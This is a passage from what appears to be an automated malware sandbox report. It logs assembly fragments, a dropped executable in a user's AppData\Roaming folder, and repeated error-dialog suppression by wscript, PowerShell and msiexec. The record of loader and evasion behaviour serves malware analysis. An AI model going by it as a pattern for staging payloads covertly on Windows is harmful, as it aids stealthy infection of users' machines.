                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D900BD pushad ; iretd 2_2_00007FF848D900C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E65846 pushad ; ret 2_2_00007FF848E658E9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BBF5D7 push cs; iretd 7_3_00BBF5D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BC49D3 push 00000078h; retf 7_3_00BC49D5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BBFB3F push ds; retf 7_3_00BBFB40
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BC1B43 push eax; iretd 7_3_00BC1B44
                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
